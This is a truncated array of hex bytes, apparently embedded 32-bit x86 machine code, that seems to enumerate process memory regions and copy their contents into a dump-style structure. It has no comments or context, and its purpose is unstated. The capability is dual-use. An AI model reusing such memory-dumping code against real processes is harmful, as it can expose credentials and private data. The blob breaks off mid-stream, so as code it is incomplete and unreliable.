0x45,0xDC,0x01,0xC2,0x8B,0x45,0xB0,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xB4,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0xB8,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0xBA,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xBC,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xC0,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xC4,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xC8,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xCC,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x8B,0x45,0x98,0x89,0x44,0x24,0x08,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x64,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE6,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0x98,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x24,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x02,0xF9,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xDD,0xF8,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x85,0x54,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0x8D,0x85,0x54,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xD7,0xF8,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5C,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xD0,0x8B,0x45,0xE0,0x8B,0x40,0x04,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xAA,0xF8,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x8D,0x50,0x18,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x85,0x58,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0x89,0x54,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x43,0xF8,0xFF,0xFF,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x56,0x53,0x81,0xEC,0x5C,0x01,0x00,0x00,0x8D,0x45,0x94,0xBB,0x20,0xD0,0x48,0x65,0xBA,0x12,0x00,0x00,0x00,0x89,0xC7,0x89,0xDE,0x89,0xD1,0xF3,0xA5,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x0C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x12,0x00,0x00,0x00,0x8D,0x55,0x94,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x0B,0xE2,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9A,0x05,0x00,0x00,0x8B,0x45,0xE0,0x89,0x45,0xE4,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xE9,0xE5,0x00,0x00,0x00,0x8B,0x45,0x90,0x83,0xC0,0x01,0x89,0x45,0x90,0x8B,0x45,0x08,0x8B,0x50,0x08,0x8B,0x45,0xE4,0x89,0x90,0x14,0x02,0x00,0x00,0x8B,0x45,0xE4,0x83,0xC0,0x14,0xC7,0x44,0x24,0x04,0x00,0x02,0x00,0x00,0x89,0x04,0x24,0xE8,0x51,0x21,0x00,0x00,0x89,0x85,0x18,0xFF,0xFF,0xFF,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x83,0xC0,0x01,0x89,0x85,0x18,0xFF,0xFF,0xFF,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x01,0xC0,0x89,0x85,0x18,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0x8D,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x93,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0xB7,0xA6,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF2,0x04,0x00,0x00,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x8B,0x55,0xE4,0x83,0xC2,0x14,0x89,0x44,0x24,0x08,0x89,0x54,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x4C,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0x70,0xA6,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAB,0x04,0x00,0x00,0x8B,0x45,0xE4,0x8B,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x11,0xFF,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x45,0x8C,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0x8D,0x45,0x90,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xEF,0xF6,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0x13,0xA6,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x4E,0x04,0x00,0x00,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x1B,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8B,0x45,0xE0,0x89,0x45,0xE4,0xE9,0xCC,0x03,0x00,0x00,0x8D,0x95,0xA8,0xFE,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x1C,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8B,0x45,0xE4,0x8B,0x50,0x0C,0x8B,0x40,0x08,0xBA,0x00,0x00,0x00,0x00,0x89,0x85,0xA8,0xFE,0xFF,0xFF,0x89,0x95,0xAC,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x40,0x10,0x89,0x85,0xB0,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x80,0x1C,0x02,0x00,0x00,0x89,0x85,0xB4,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x80,0x18,0x02,0x00,0x00,0x89,0x85,0xB8,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x80,0x14,0x02,0x00,0x00,0x89,0x85,0xBC,0xFE,0xFF,0xFF,0xC7,0x85,0xC0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xC4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xC8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xCC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xDC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xE0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xE4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xE8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xEC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xF0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xF4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xF8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xFC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x00,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x08,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x0C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x10,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x14,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x8D,0x0C,0x02,0x8B,0x85,0xA8,0xFE,0xFF,0xFF,0x8B,0x95,0xAC,0xFE,0xFF,0xFF,0x89,0x01,0x89,0x51,0x04,0x83,0x45,0xDC,0x08,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xB0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xB4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xB8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xBC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xC0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xC4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xC8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xCC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xD0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xD4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xD8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xDC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xE0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xE4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xE8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xEC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xF0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xF4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xF8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xFC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0x00,0xFF,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x8D,0x0C,0x02,0x8B,0x85,0x08,0xFF,0xFF,0xFF,0x8B,0x95,0x0C,0xFF,0xFF,0xFF,0x89,0x01,0x89,0x51,0x04,0x83,0x45,0xDC,0x08,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x8D,0x0C,0x02,0x8B,0x85,0x10,0xFF,0xFF,0xFF,0x8B,0x95,0x14,0xFF,0xFF,0xFF,0x89,0x01,0x89,0x51,0x04,0xC7,0x44,0x24,0x08,0x6C,0x00,0x00,0x00,0x8D,0x85,0x20,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x09,0xF3,0xFF,0xFF,0x85,0xC0,0x75,0x21,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0x2D,0xA2,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xEB,0x6B,0x8B,0x45,0xE4,0x8B,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x2A,0xFC,0xFF,0xFF,0x8B,0x45,0x90,0x6B,0xC0,0x6C,0x83,0xC0,0x04,0x89,0x85,0x1C,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x85,0x1C,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x30,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x6C,0xF2,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0x8C,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x34,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x4A,0xF2,0xFF,0xFF,0x8B,0x45,0xE0,0x81,0xC4,0x5C,0x01,0x00,0x00,0x5B,0x5E,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x8B,0x45,0x0C,0x89,0x45,0xFC,0xEB,0x3B,0x8B,0x45,0xFC,0x8B,0x50,0x0C,0x8B,0x40,0x08,0x89,0xC2,0x8B,0x45,0x08,0x39,0xD0,0x72,0x21,0x8B,0x45,0xFC,0x8B,0x50,0x0C,0x8B,0x40,0x08,0x89,0xC2,0x8B,0x45,0xFC,0x8B,0x40,0x10,0x01,0xD0,0x8B,0x55,0x08,0x39,0xC2,0x73,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x13,0x8B,0x45,0xFC,0x8B,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0xBF,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x74,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x1C,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xB0,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x1C,0x00,0x00,0x00,0x8D,0x55,0xB0,0x89,0x54,0x24,0x0C,0x8B,0x55,0xE4,0x89,0x54,0x24,0x08,0x8B,0x55,0xF0,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x58,0xE4,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x88,0x89,0x01,0x00,0x00,0x8B,0x45,0xB0,0x89,0x45,0xDC,0x8B,0x45,0xBC,0x89,0x45,0xD0,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0x89,0xC1,0xBB,0x00,0x00,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x55,0xD4,0x01,0xC8,0x11,0xDA,0x8B,0x4D,0xDC,0xBB,0x00,0x00,0x00,0x00,0x39,0xC8,0x89,0xD0,0x19,0xD8,0x0F,0x82,0x51,0x01,0x00,0x00,0x8B,0x55,0xD0,0x8B,0x45,0xDC,0x01,0xD0,0x89,0x45,0xF0,0x8B,0x45,0xC0,0x3D,0x00,0x10,0x00,0x00,0x0F,0x85,0x11,0x01,0x00,0x00,0x8B,0x45,0xC8,0x3D,0x00,0x00,0x04,0x00,0x0F,0x84,0x09,0x01,0x00,0x00,0x8B,0x45,0xC4,0x83,0xE0,0x01,0x85,0xC0,0x0F,0x85,0x01,0x01,0x00,0x00,0x8B,0x45,0xC4,0x25,0x00,0x01,0x00,0x00,0x85,0xC0,0x0F,0x85,0xF7,0x00,0x00,0x00,0x8B,0x45,0xC4,0x83,0xE0,0x10,0x85,0xC0,0x0F,0x85,0xEF,0x00,0x00,0x00,0x8B,0x45,0xC8,0x3D,0x00,0x00,0x00,0x01,0x75,0x1A,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0xDC,0x89,0x04,0x24,0xE8,0x7F,0xFE,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0xD1,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x28,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xCC,0x83,0x7D,0xCC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xB4,0x00,0x00,0x00,0x8B,0x45,0xCC,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0xBA,0x00,0x00,0x00,0x00,0x8B,0x4D,0xCC,0x89,0x41,0x08,0x89,0x51,0x0C,0x8B,0x4D,0xCC,0x8B,0x45,0xD0,0x8B,0x55,0xD4,0x89,0x41,0x10,0x89,0x51,0x14,0x8B,0x55,0xC0,0x8B,0x45,0xCC,0x89,0x50,0x18,0x8B,0x55,0xC4,0x8B,0x45,0xCC,0x89,0x50,0x1C,0x8B,0x55,0xC8,0x8B,0x45,0xCC,0x89,0x50,0x20,0x83,0x7D,0xF4,0x00,0x75,0x08,0x8B,0x45,0xCC,0x89,0x45,0xF4,0xEB,0x21,0x8B,0x45,0xF4,0x89,0x45,0xE8,0xEB,0x08,0x8B,0x45,0xE8,0x8B,0x00,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x8B,0x00,0x85,0xC0,0x75,0xEF,0x8B,0x45,0xE8,0x8B,0x55,0xCC,0x89,0x10,0x83,0x45,0xEC,0x01,0xE9,0x5C,0xFE,0xFF,0xFF,0x90,0xE9,0x56,0xFE,0xFF,0xFF,0x90,0xE9,0x50,0xFE,0xFF,0xFF,0x90,0xE9,0x4A,0xFE,0xFF,0xFF,0x90,0xE9,0x44,0xFE,0xFF,0xFF,0x90,0xE9,0x3E,0xFE,0xFF,0xFF,0x90,0xE9,0x38,0xFE,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x54,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x45,0xE4,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xBB,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAA,0x03,0x00,0x00,0x8B,0x45,0xF0,0x89,0x45,0xF4,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xEB,0x1A,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x83,0xC0,0x01,0x83,0xD2,0x00,0x89,0x45,0xD8,0x89,0x55,0xDC,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0xE0,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x70,0xEF,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x94,0x9E,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x32,0x03,0x00,0x00,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x83,0xC0,0x01,0x83,0xD2,0x00,0x0F,0xA4,0xC2,0x04,0xC1,0xE0,0x04,0x83,0xFA,0x00,0x76,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x58,0x9E,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF6,0x02,0x00,0x00,0x8B,0x45,0xD8,0x8B,0x55,0xDC,0x83,0xC0,0x01,0xC1,0xE0,0x04,0x89,0x45,0xD4,0x8B,0x45,0xE4,0x89,0xC1,0xBB,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0xBA,0x00,0x00,0x00,0x00,0x01,0xC8,0x11,0xDA,0x89,0x45,0xC8,0x89,0x55,0xCC,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xC7,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xEB,0x9D,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x89,0x02,0x00,0x00,0x8B,0x45,0xF0,0x89,0x45,0xF4,0xE9,0x92,0x00,0x00,0x00,0x8B,0x45,0xF4,0x83,0xC0,0x08,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x77,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x9B,0x9D,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x39,0x02,0x00,0x00,0x8B,0x45,0xF4,0x83,0xC0,0x10,0xC7,0x44,0x24,0x08,0x08,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x32,0xEE,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x56,0x9D,0xFF,0xFF,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF4,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x85,0x64,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xD4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x3C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA4,0xED,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x40,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x82,0xED,0xFF,0xFF,0x8B,0x45,0xF0,0x89,0x45,0xF4,0xE9,0x86,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0xC3,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x55,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x89,0xC3,0x8B,0x45,0xF4,0x8B,0x50,0x0C,0x8B,0x40,0x08,0x89,0xC1,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x89,0x5C,0x24,0x0C,0x8B,0x55,0xEC,0x89,0x54,0x24,0x08,0x89,0x4C,0x24,0x04,0x89,0x04,0x24,0xE8,0x61,0xDF,0xFF,0xFF,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x8B,0x50,0x14,0x8B,0x40,0x10,0x83,0xFA,0x00,0x76,0x11,0x8B,0x45,0xF4,0xC7,0x40,0x10,0xFF,0xFF,0x